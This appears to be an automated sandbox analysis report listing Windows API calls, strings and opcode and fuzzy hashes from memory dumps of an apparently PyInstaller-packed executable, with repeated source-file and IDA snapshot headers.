• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction ID: 314685293357904ecf1fac36fb6cc006a5f6e1658bc41e2d049bf9b4e829f8ba
• Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
• Instruction Fuzzy Hash: 5C119331B18A8186E750AB56F854369A7A0FB88BE4F840334EA7D877E4DF3CD81487D0

APIs
• GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588592
• K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5885E9
  • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588678
• K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886E4
• FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886F5
• FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF58870A
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction ID: dc71c123385a93be16f486061bf5243f00c909a177be6d40365a02fc510fd84e
• Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
• Instruction Fuzzy Hash: 3B41A462B196C241EB30BB12A5446EAA3A4FB84BC5F840235DF7D97BC5DE3CD501C7A4
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B347
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B37D
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3AA
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3BB
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3CC
• SetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3E7
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
• Instruction ID: 8a73e7bb8976d04809ad3fe8a4c7c1b5a068a81604ddb3850d1a07ef3e2e945e
• Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
• Instruction Fuzzy Hash: E6116A24A0D6D692FB6CB32156811BDE2865F447A0FD48338E93E477EADE2CE50183A0
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
Strings
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
• Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction ID: 42dd674dd24792ac39509d55fb4ee60895bc35c055690b4fa890fb0b15b52b89
• Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
• Instruction Fuzzy Hash: D331F822B196C152EB20B761B8416E6A694BF887D4F800231EEBD83795EF7CD546C790
APIs
Strings
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction ID: e80e6ccd7687d2ee56b7cac09bab08abe4f8a49e2eae157f4c834f43a8af26d4
• Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
• Instruction Fuzzy Hash: 2D318672609AC289EB24EF61F8552F9A760FF89784F840235EA6D47B95DF3CD101C790
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7FF58918F,?,00007FF7FF583C55), ref: 00007FF7FF582BA0
• MessageBoxW.USER32 ref: 00007FF7FF582C2A
Strings
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
• Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
• Instruction ID: f4714e97318661e080f529a998005d688af2b1446776263923478a69a62d1afc
• Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
• Instruction Fuzzy Hash: B021E562709B8192E710AB14F8447EAB7A4FB887C0F800232EEAD57795DF3CD215C790
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7FF581B99), ref: 00007FF7FF582760
Strings
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction ID: 23891c94ccfbae8f1ee5ef28d63340dbc9028809e5bc62b8d3717c2ebc8fd39f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21A172A197C192EB20EB51B8817E6A7A4FB88384F800231EEAD53699DF7CD545C790
APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction ID: 4cbbaa73a43a3f4b39e91f011e3df131ced85e44cc30110a830a55516fbd4564
• Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
• Instruction Fuzzy Hash: 2AF04F61A09B8691EB24AF24A4553BAA721AF45761F940335C67E471F4DF2CD05583E0
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction ID: 373582d56bc14f5b79f989221e51d831d5d5636bbf65fbbd04a4fb52ef9f3c97
• Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
• Instruction Fuzzy Hash: 9F11BF62E4EEF701F7543924D4963F5A0447F58360F840734EBBE872D68E2CA861C1A0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B41F
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B43E
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B466
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B477
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF59A613,?,?,00000000,00007FF7FF59A8AE,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59B488
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
• Instruction ID: 21f75c244663fa12a2c73b7ceab3ba02b868ae5af6446711379f7e5035b369d9
• Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
• Instruction Fuzzy Hash: 49114C20A0DAC642FB7CB72556511F9E2865F847B0FD88334E93E576E6DE2CE50293A0
APIs
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
• Instruction ID: 316882c0d52f0d42a96982b0d06deb3e468641e184b38baeaf343e5116f1fc3b
• Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
• Instruction Fuzzy Hash: 92112A24E0928B52FB7CB36544521FDA1858F46770FD88738D93E5B2E2DD2CB50142F1
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction ID: 50e1d1209a7165d453bee2a0231e885041ac78346e44468ad3a2f770e2c18d7e
• Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction Fuzzy Hash: C491B132A08A8685FB79AF24D4507BDB791AB40B94FC44336DA79473D5DF3CE40A83A1
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction ID: 099db035078488b178ef4e75341e2ff237f372823fdb75a7423a4ba6f501a310
• Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
• Instruction Fuzzy Hash: 9881C432E0C2C286F7BC6F2581102F8B6E0AB51748FD99235DA39972C5DF2DE90183E1
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                      • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction ID: d489551160167ab9b0a6567a1cfcfaaeeb678087ee9f8f5455c1602c2fa9376d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D51A232B196818ADB14AF15E044BB8A7D1FB44B98F914230DA7D877C8EF3CE845CB90
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction ID: 17ab65d3ae5609a70c0cdbac56963b814ad9c94e18f717db7be9dd65e50831d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1561B432908BC586D760AB15E4407EAFBA0FB89784F444325EBAD07B95DF7CD191CB50
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                      • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction ID: 6ed6950d718bc4685e13a8d95892edc7af1d3145f7b4974e79e59d24daaf7f10
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26518E329086C286EB64AE2194443A8B6E0FB59B94F944336EABD47BD5CF3CE450C791
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7FF58352C,?,00000000,00007FF7FF583F23), ref: 00007FF7FF587F22
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                      • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                      • Instruction ID: 32be83ce6d4a459b06ada111c58a9cbcabf97a4ca1fea3de9b4d79cda10e9477
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D531B061619AC145EB21AB21F8507EAA354FF88BE4F840331EE7D47BC9EE2CD645C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                      • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction ID: cd390d2fd8c64561ad633427d078f8982fb251811455d2cae1e41af6ac5b484e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA21E572708B8192E710AB14F8447EAB7A0FB88780F800232EEAD537A5DF3CD255C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction ID: 524178aa164c67a5b5d14dcd063152a926598bebfe668d04ac25221016ce5405
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D102B2B18AC28AE724DF64D4441EC7771FB44798B848225DE7D97BD9DE38D016C390
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction ID: 6d9a180b653529e0fa2ef35c5871fd47761ea4722ef20f83899a1128368b7108
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651F872F0819186FB28EF2499556FCA7A2AB00358F914335DE3E53AE5DF38E401C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                      • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction ID: c66ffc659509a44edf585ef93c600a7054aa9cfe150748ff6a9b4cafb3a9e980
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51BF22E086818AFB28EF71D4503FDA3E1AB44B58F948635DE2D476C9DF38D460C3A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction ID: ea22a9ceabe4f21caf947149c83ca4085102e6e9c6bc832b16de07e8bfdef316
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A11E521F0C5C282FB54A76AE5442F99A92FB88780FD88230DB7907BD9CD7DD5D1C2A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
